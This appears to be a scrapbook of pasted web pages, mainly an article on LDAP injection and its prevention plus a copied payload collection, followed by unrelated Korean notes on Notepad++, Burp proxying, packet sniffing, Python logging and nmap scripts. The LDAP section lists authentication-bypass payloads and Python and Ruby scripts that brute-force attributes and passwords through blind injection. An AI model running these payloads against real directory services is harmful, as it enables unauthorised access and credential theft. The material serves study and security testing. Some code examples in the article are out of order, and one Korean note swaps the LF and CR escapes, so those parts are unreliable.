https://www.netsparker.com/blog/web-security/ldap-injection-how-to-prevent/

LDAP injection attacks exploit input validation vulnerabilities to inject and execute queries to Lightweight Directory Access Protocol servers. By supplying specially constructed user inputs to a vulnerable application, attackers can extract potentially sensitive information from an organization’s LDAP directory. LDAP services are crucial for the daily operation of many organizations, and a successful LDAP injection attack can provide valuable information for further attacks on systems and applications. In this article, we will look at how LDAP injection works and see how it can be prevented to improve web application security.

The Importance of LDAP Servers

The Lightweight Directory Access Protocol, or LDAP, is an open application protocol for accessing and maintaining directory services in an IP network (see RFC 4511 for the specification). Organizations typically store information about users and resources in a central directory (such as Active Directory), and applications can access and manipulate this information using LDAP statements. In effect, LDAP servers are a gateway to a wealth of sensitive information, including user credentials, staff names and roles, shared network resources device and so on. Although less publicized than SQL injection attacks, LDAP injection attacks can yield valuable information about an organization’s internal infrastructure and potentially even provide attackers with access to database servers and other internal systems.

LDAP Statement Syntax

Clients can query an LDAP server by sending requests for directory entries that match specific filters. If entries are found that match the LDAP search filter, the server returns the requested information. Search filters used in LDAP queries follow the syntax specified in RFC 4515 (originally RFC 2254). Filters are constructed from any number of LDAP attributes specified as key-value pairs in parentheses. Filters can be combined using logical and comparison operators and can include wildcards. Here are a few examples:

• (cn=John*) matches entries where the common name starts with John (* matches any character)
• (!(cn=*Doe)) matches entries where the common name doesn’t end with Doe (! is logical NOT)
• (&(cn=J*)(cn=*Doe)) matches entries where the common name starts with J and ends with Doe (& is logical AND)
• (&(|(cn=John*)(cn=Jane*))(cn=*Doe)) matches entries where the common name starts with John or Jane and ends with Doe (| is logical OR)

Multiple filters and operators are combined using prefix notation (Polish notation), with arguments following the operator. For a full description of LDAP search filter syntax, see RFC 4515.

How LDAP Injection Works

As with SQL injection and related code injection attacks, LDAP injection vulnerabilities occur when an application inserts unsanitized user input directly into an LDAP statement. By crafting suitable string values using LDAP filter syntax, attackers can cause the LDAP server to execute a variety of queries and other LDAP statements. If combined with misconfigured or compromised permissions, LDAP injections may allow attackers to modify the LDAP tree and tamper with business-critical information.

While LDAP injections come in many shapes and sizes, here are two typical approaches:

• Authentication bypass: Directory services are commonly used for user authentication and authorization, so the most basic LDAP injection attacks attempt to bypass password checking. Take the following vulnerable JavaScript code that directly assembles a simple LDAP filter from user inputs stored in the variables enteredUser and enteredPwd:For non-malicious users, the resulting filter should be something like:If this query is true, the user and password combination exists in the directory, so the user is logged in. However, an attacker can enter LDAP filter code as the user ID (shown in red) to create a filter that is always true, for example:This can allow the attacker to gain access without a valid user name or password.
• (&(userID=*)(userID=*))(|(userID=*)(password=anything))
• (&(userID=johndoe)(password=johnspwd))
• filterContent = "(&(userID=" + enteredUser + ")(password=" + enteredPwd + "))"
• Information disclosure: If a vulnerable application uses LDAP filters to provision shared resources, for example printers, an attacker performing recon might inject LDAP filter code to list all resources in the organization’s directory. Let’s say the following filter intended to list printers and scanners is assembled in an unsafe way:If the attacker can enter another value instead of printer and knows that userID is used for user names in the directory, they might inject the following code:This will list all printer and user objects, and the scanner part will be ignored by the server (only the first complete filter is processed).
• (|(resType=printer)(userID=*))(resType=scanner))
• (|(resType=printer)(resType=scanner))

Blind LDAP Injection

To directly query an LDAP server, the attacker needs to know (or guess) the attribute names so they can be specified in a filter. Blind LDAP injection is a more advanced exploitation technique for extracting unknown information by sending multiple requests and checking server responses to determine if the query is valid. Combined with additional optimizations and automation, this allows attackers to obtain information using a series of yes/no questions: a valid server response means “yes”, and a server error means “no”. Effective blind injection attacks typically involve several steps:

• Attribute discovery: Attackers can query a variety of likely attributes and monitor server responses. If an attribute exists, the server will return a valid response. Otherwise, an error or empty response is returned. Let’s say an application unsafely constructs an AND filter to retrieve users, such as:If the attacker can manipulate the user ID value, they can inject code like the following to check if user objects in this directory have a department attribute:If the department attribute exists (and John Doe is a valid user ID), the server will return a valid response. Otherwise, the attacker can try other attribute names.
• (&(userID=John Doe)(department=*))(objectClass=user))
• (&(userID=John Doe)(objectClass=user))
• Booleanization: Once an attribute name is known, the attacker can send a series of requests containing wildcards and/or comparison operators to determine specific attribute values. Again, only two server responses are considered, so booleanization is the process of transforming the search process into a series of true/false tests.

  (&(userID=John Doe)(department=a*))(objectClass=user))

  A valid server response means that a department starting with the letter “a” exists. The attacker can continue the process for ab*, ac*, and so forth, to discover subsequent characters. For numeric values, the operators <= (less than or equal to) and >= (greater than or equal to) can be used to go through the likely value space.
• Let’s say the department attribute from the previous example exists. To discover the department name, the attacker can start by injecting the following code to check the first letter:
• Character set reduction: To minimize the number of requests, attackers can use multiple wildcards to find out which characters are present anywhere in the target value. For example, a valid server response for the following injection:means that a department name containing the letter “x” exists. If an error or empty response is returned, the attacker can eliminate this character from the scan. This can greatly reduce the number of requests needed to find the target value.
• (&(userID=John Doe)(department=*x*))(objectClass=user))

Preventing LDAP Injection in Web Applications

As with many other injection attacks, proper input validation and encoding in the application layer is critical to eliminate LDAP injection vulnerabilities. Every user input that might be used within LDAP queries should be sanitized according to application requirements and encoded to ensure that any remaining LDAP special characters are safely escaped, including at least ( ) ! | & *. The OWASP cheat sheet has more detailed information about escaping techniques. For maximum security and convenience, a ready framework or library should be used for escaping special characters and assembling LDAP filters.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

LDAP injection

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.

Summary

• Exploitation
• Payloads
• Blind Exploitation
• Defaults attributes
• Exploiting userPassword attribute
• Scripts
  • Discover valid LDAP fields
  • Special blind LDAP injection

Exploitation

Example 1.

user  = *)(uid=*))(|(uid=*
pass  = password
query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))

Example 2

user  = admin)(!(&(1=0
pass  = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))

Payloads

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Blind Exploitation

We can extract using a bypass login

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
(&(sn=administrator)(password=MY*))  : OK
(&(sn=administrator)(password=MYA*)) : KO
(&(sn=administrator)(password=MYB*)) : KO
(&(sn=administrator)(password=MYC*)) : KO
...
(&(sn=administrator)(password=MYK*)) : OK
(&(sn=administrator)(password=MYKE)) : OK

Defaults attributes

Can be used in an injection like *)(ATTRIBUTE_HERE=*

userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName

Exploiting userPassword attribute

userPassword attribute is not a string like the cn attribute for example but it’s an OCTET STRING In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).

octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.

userPassword:2.5.13.18:=\xx (\xx is a byte)
userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx

Scripts

Discover valid LDAP fields

#!/usr/bin/python3

import requests
import string

fields = []

url = 'https://URL.com/'

f = open('dic', 'r') #Open the wordlists of common attributes
wordl = f.read().split('\n')
f.close()

for i in wordl:
    r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
    if 'TRUE CONDITION' in r.text:
        fields.append(str(i))

print(fields)

Ref. [5][5]

Special blind LDAP injection (without "*")

#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
        if ("TRUE CONDITION" in r.text):
            flag += char
            print("[+] Flag: " + flag)
            break

Ref. [5][5]

#!/usr/bin/env ruby

require 'net/http'
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')

flag = ''

(0..50).each do |i|
  puts("[i] Looking for number #{i}")
  alphabet.each do |char|
    r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
    if /TRUE CONDITION/.match?(r)
      flag += char
      puts("[+] Flag: #{flag}")
      break
    end
  end
end

By noraj

References

• OWASP LDAP Injection
• LDAP Blind Explorer
• ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN
• Quals ECW 2018 - Maki
• How To Manage and Use LDAP Servers with OpenLDAP Utilities
• How To Configure OpenLDAP and Perform Administrative LDAP Tasks
• SSH key authentication via LDAP
  • How to setup LDAP server for openssh-lpk
  • openssh-lpk.ldif
  • Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04
  • SSH key authentication using LDAP
  • [FR] SSH et LDAP
  • SSH Public Keys in OpenLDAP

https://www.sonarqube.org/downloads/?gads_campaign=Asia-SonarQube&gads_ad_group=SonarQube&gads_keyword=sonarqube&gclid=EAIaIQobChMIp-ng4d289QIVzkNgCh2ziQhkEAAYASAAEgKybfD_BwE

확인이 필요함

https://mainia.tistory.com/6264

텍스트에서 "개행문자" 란 "줄바꿈문자" 를 말합니다. "라인피드" 는 커서를 한 칸 아래로 이동해서 새로운 라인을 추가할 때 사용하는 문자입니다. "캐리지리턴" 은 커서를 제일 왼쪽으로 이동합니다. 개행문자는 라인피드 + 캐리지리턴 으로 이루어지는 것입니다. 예를 들어 컴퓨터에서 Enter 키를 누르면 줄바꿈이 이루어집니다. 이것을 개행이라고 합니다. 그런데 사용자 눈에는 보이지 않기 때문에 백스페이스나 Delete 키로 삭제할 수 없습니다. 그래서 노트패드++ 과 같은 텍스트 편집 도구를 이용하는 것입니다.

용어를 정리하자면 다음과 같습니다.

l  개행문자 (줄바꿈문자) = 라인피드(LF, Line Feed) + 캐리지리턴(CR, Carrige Return)

l  LF, Line Feed : 아스키 코드 10번 -> \r

l  CR, Carrige Return : 아스키 코드 13번 -> \n

▼ 그림처럼 여러 줄로 이루어진 문자열 끝에는 눈에 보이지 않지만 줄바꿈문자가 들어가 있습니다.

▼ 줄바꿈문자를 문자를 제거하고 싶다면 바꾸기 창을 띄웁니다. Ctrl + h 단축키를 이용합니다. 

▼ 줄바꿈 문자를 제거해서 여러 줄로 나누어져 있는 글을 하나로 합쳐보겠습니다. 바꾸기 창의 찾을 내용에 Line Feed 와 Carrige Return 을 입력합니다. 그리고 아래로 가서 검색 모드를 일반에서 확장으로 바꿉니다. 

▼ 모두 바꾸기 버튼을 눌러 줄바꿈 문자를 모두 제거합니다. 결과는 아래와 같습니다. 여러 줄로 나누어져 있던 것이 한 줄로 합쳐졌습니다. 

▼ 다음은 단어 사이에 있는 공백을 모두 줄 바꿈으로 바꿔보겠습니다. 찾을 내용에 스페이스바를 이용해서 공백을 넣습니다. 그리고 모두 바꾸기 버튼을 클릭합니다. 

▼ 그림처럼 공백이 있는 공간에 줄바꿈문자가 들어가면서 여러 줄이 되었습니다.

https://hackcatml.tistory.com/19

python requests 모듈 사용시 다음과 같은 코드를 삽입하여 요청 응답 패킷을 버프로 캡쳐가능

import os
proxy = '127.0.0.1:8080'
#환경 변수 설정
os.environ['HTTP_PROXY'] = proxy
os.environ['HTTPS_PROXY'] = proxy
os.environ['REQUESTS_CA_BUNDLE'] = "C:\\Users\\hackcatml\\Desktop\\burpSuite\\cacert.pem" #인증서 위치

사전에 .pem 포맷의 버프 인증서가 필요함

burp에서 인증서 export하게 되면 .der 포맷임

cmd에서 다음 명령어로 .pem포맷 인증서로 변경

openssl x509 -inform der -in cacert.der -out cacert.pem 

다음 예제는, https://webhacking.kr에 requests모듈을 이용하여 GET, POST 전송하되 버프 프록시를 거쳐가게 하는 코드(문제풀이와는 무관)

import requests
import os
from bs4 import BeautifulSoup

proxy = '127.0.0.1:8080'
#환경 변수 설정
os.environ['HTTP_PROXY'] = proxy
os.environ['HTTPS_PROXY'] = proxy
os.environ['REQUESTS_CA_BUNDLE'] = "C:\\Users\\hackcatml\\Desktop\\burpSuite\\cacert.pem" #인증서 위치

url = 'https://webhacking.kr/challenge/code-4/'	# https 사이트
id = 'admin'
cmt = 'love'

res = requests.get(url)
parse = BeautifulSoup(res.content, 'html.parser')
captcha = parse.find('input', {'name': 'captcha_'}).get('value')

payload = f'id={id}&cmt={cmt}&captcha={captcha}'
custom_header = {'Cookie': 'PHPSESSID=04agjetkpqrhbvgijmctrfa8c3;'}

res = requests.post(url, data = payload, headers = custom_header)

실행하고 BurpSuite에서 HTTP history 확인

http://apollo89.com/wordpress/?p=1964

https://taesun1114.tistory.com/entry/Python-%ED%8C%A8%ED%82%B7-%EC%BA%A1%EC%B3%90with-pypcap

python 내 패킷 캡쳐를 위한 라이브러리로 pypcap을 통해 손쉽게 캡쳐 및 가공이 가능합니다.

다만 pypcap에 대한 자료가 많지않아서 원하는 함수나 기능을 사용하기엔 제약이 있습니다 :/

pypcap installation

pip install pypcap

※ libpcap-dev 의존성을 가지고 있으므로 pypcap 설치전에 libpcap-dev가 설치되어 있어야  함

apt-get install libpcap-dev

pypcap 설치 후 python 실행 > import pcap 을 통해 에러가 발생하지 않는다면 정상적으로 설치가 된 것입니다.

Example Code 

import pcap
import re
import dpkt
import socket

sniffer = pcap.pcap(name=None,promisc=True,immediate=True,timeout_ms=50) # name=eth, None 일경우 모든 default / promisc는 모든 eth에서 패킷 수집 
sniffer.setfilter('tcp and port 80') # set packet filter

for t, p in sniffer:
    eth = dpkt.ethernet.Ethernet(p)
    ip = eth.data
    tcp = ip.data
    try:
        if len(tcp.data) > 0:
            req = dpkt.http.Request(tcp.data)	#Request패킷만 추출
            print("----------------------------------------------------------------")
            print(req)	# 패킷 출력
            print("----------------------------------------------------------------")
    except:
        pass

https://jjig810906.tistory.com/9

Python logging 사용하기

python으로 개발하면서 로그를 남기고 저장하기위한 기본 모듈인 logging에 대한 설명이다.

logging 모듈을 사용하는 방법은 아래와 같다.

debug, info, warning, error, critical 5단계로 로그를 구분하여 등록 할 수 있다.

import logging


logging.debug("test debug log")
logging.info("info log")
logging.warning("warring !!!!")
logging.error("bug bug bug bug")
logging.critical("critical !! ~~")

위 코드를 실행하면 warning, error, critical 에 해당하는 로그만 출력된다.

이유는 기본설정이 warning 이상의 로그만 출력되도록 설정되어있다.

모든 로그가 출력되도록 하려면

import logging 아래 다음 코드를 넣어준다.

logging.basicConfig(level=logging.DEBUG) #기본값은 warning (warning 이상의 로그만 출력됨)

이제 코드를 실행하면 입력한 모든 로그가 콘솔에 출력된다.

로그를 콘솔에 출력하지 않고 파일에 저장하려면 아래와 같이 filename 정보를 넣어주면 된다.

logging.basicConfig(filename='./test.log', level=logging.DEBUG) #기본값은 warning (warning 이상의 로그만 출력됨)

이렇게 로그를 저장하게 되면 하나의 파일에 용량이 커지게되고, 나중에 파일 용량이 너무 커서 열지 못하는 문제가 발생 할 수 있다.

이런 문제를 해결하기위해 RotatingFileHandler를 사용하여 로그저장파일의 크기가 커지면 다른파일에 등록하도록 할 수 있다.

import logging
from logging.handlers import RotatingFileHandler


logger = logging.getLogger(__name__)
fileHandler = RotatingFileHandler('./myLogger.log', maxBytes=1024*5, backupCount=5)
fileHandler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] [%(filename)s:%(lineno)s] >> %(message)s'))
logger.addHandler(fileHandler)
logger.setLevel(logging.DEBUG)



logger.debug("test debug log")
logger.info("info log")
logger.warning("warring !!!!")
logger.error("bug bug bug bug")
logger.critical("critical !! ~~")

전체 코드는 위와 같고

중요한 부분은 아래와 같다.

RotatingFileHandler('./myLogger.log', maxBytes=1024*5, backupCount=5)

maxByte = 해당 용량이상이 되면 해당파일을 백업하고 새로운 파일에 로그를 저장한다.

backupCount = 백업된 파일을 몇개 유지할것인지 설정한다. (5로 설정되면 5개의 백업파일을 유지한다.)

출처: https://jjig810906.tistory.com/9 [프로그램마귀]

https://m.blog.naver.com/PostView.naver?isHttpsRedirect=true&blogId=wwwkasa&logNo=221114926044

정말 오랜만에 글 작성하는 것 같네요. 매일 정신없이 하루를 보내고, 당분간은 쭉 그럴거 같습니다.. 지난번 nmap 정리에 대한 이야기의 연장선으로 NSE에 대해 잠깐 볼까합니다.

[[HACKING] NMAP Part1 - nmap을 이용한 여러가지 네트워크 스캔 기법(network scan with nmap)](http://www.hahwul.com/2016/03/hacking-nmap-part1-nmap-network-scan.html) 
[[HACKING] NMAP Part2 - NSE(Nmap Script Engine)을 이용한 취약점 스캐닝(Vulnerability scan with NSE Script)](http://www.hahwul.com/2016/03/hacking-nmap-part2-nsenmap-script.html) 

Nmap script 인 NSE는 nmap을 통해 네트워크 스캔을 진행하거나, 취약점 진단을 수행할 때 요긴하게 쓰일 수 있는 스크립트입니다. Lua로 작성되어 있으며 nmap을 통해 포트스캔, 네트워크 접근 이외에도 더 넓은 범위의 체킹이 가능하게 해주는 중요한 도구지요.

NSE(Nmap Script Engine)?

위에서도 대충 설명드렸지만 NSE는 nmap에서 사용되는 script 입니다. lua로 개발되었으며 아래와 같이 5개 카테고리의 script 를 가지고 있습니다.

1. Network discovery
2. More sophisticated and accurate OS version detection
3. Vulnerability detection
4. Backdoor detection
5. Vulnerability exploitation

NSE Update & NSE List Check

nse script update는 nmap 사용 시 –script-update, –script-updatedb 옵션으로 업데이트를 진행할 수 있습니다.

#> nmap –script-update #> nmap –script-updatedb

Starting Nmap 6.47 ( http://nmap.org ) at 2016-03-14 12:19 KST NSE: Updating rule database. NSE: Script Database updated successfully. Nmap done: 0 IP addresses (0 hosts up) scanned in 0.51 seconds

위 명령을 수행하면 nmap.org에서 추가된 nse script 를 받아 nmap 디렉토리에 저장하게 되지요. 저장된 nse 파일은 find나 locate 명령으로 찾아볼 수 있습니다.

#> locate *.nse /usr/share/nmap/scripts/acarsd-info.nse /usr/share/nmap/scripts/address-info.nse /usr/share/nmap/scripts/afp-brute.nse /usr/share/nmap/scripts/afp-ls.nse /usr/share/nmap/scripts/afp-path-vuln.nse /usr/share/nmap/scripts/afp-serverinfo.nse /usr/share/nmap/scripts/afp-showmount.nse ..snip..

이제 nse를 사용하기 위한 준비 작업은 끝났습니다.

NSE Use

NSE의 사용은 nmap에서 –script 옵션을 통해 사용이 가능하며 인자값으로 해당 모듈 이름이 들어가게 되면 해당 nse를 사용하여 스캔을 진행합니다.

#> nmap –script ajp-auth

위와 같이 명령 시 ajp 인증 프로토콜에 대해 스캔을 진행합니다. 한번에 여러가지 스크립트를 사용하기 위해 * 등을 통해 규칙을 지정해줍니다.

간단한 예시로 취약성에 대해 스캔하는 모듈을 찾는다고 하면 아래와 같이 locate 명령을 줄 수 있겠지요.

#> locate vul.nse /usr/share/nmap/scripts/afp-path-vuln.nse /usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse /usr/share/nmap/scripts/http-huawei-hg5xx-vuln.nse /usr/share/nmap/scripts/http-iis-webdav-vuln.nse /usr/share/nmap/scripts/http-vmware-path-vuln.nse /usr/share/nmap/scripts/http-vuln-cve2009-3960.nse ..snip..

또한 nmap에서 스크립트를 사용할때도 동일한 방법으로 가능합니다. #> nmap –script “http-” #> nmap –script “ssh”

Category Scan(Default/Safe/etc..)

위에서는 각각 nse 스크립트를 사용하는 방법에 대해 보았다면 이번에는 좀 더 넓은 범위의 스캔 옵션을 볼까합니다. (귀찮아서 저도 많이 쓰는 옵션이라죠..)

nse에 지정된 category를 통해서 한번에 여러가지 script에 대해 동작을 진행할 수 있습니다. 대표적으로 default 그룹과 safe 그룹등이 있겠네요.

Default Scan Default Scan은 타겟 도메인의 전반적인 항목에 대해 스캔을 수행하는 옵션입니다. –script 옵션에 default를 인자값으로 주게되면 테스트를 진행하게 됩니다.

#> nmap –script=default 127.0.0.1

Starting Nmap 6.47 ( http://nmap.org ) at 2016-03-14 12:21 KST Nmap scan report for 127.0.0.1 Host is up (0.00096s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http |_http-generator: XpressEngine |_http-methods: No Allow or Public header in OPTIONS response (status code 302) | http-title: MAIN

Safe Scan은 Safe 카테고리에 있는 항목들로 구성된 NSE 그룹입니다.

Safe Scan #> nmap –script=safe 127.0.0.1 ..snip..

Traceroute

#> nmap –script-trace

NSE Script List

1. 설치된 NSE 스크립트. locate 명령으로 쉽게 찾을 수 있습니다. 물론 find 명령으로도 가능하지요 : ) #> locate *.nse
2. nmap에서 제공하는 nse 스크립트 description & list https://nmap.org/nsedoc/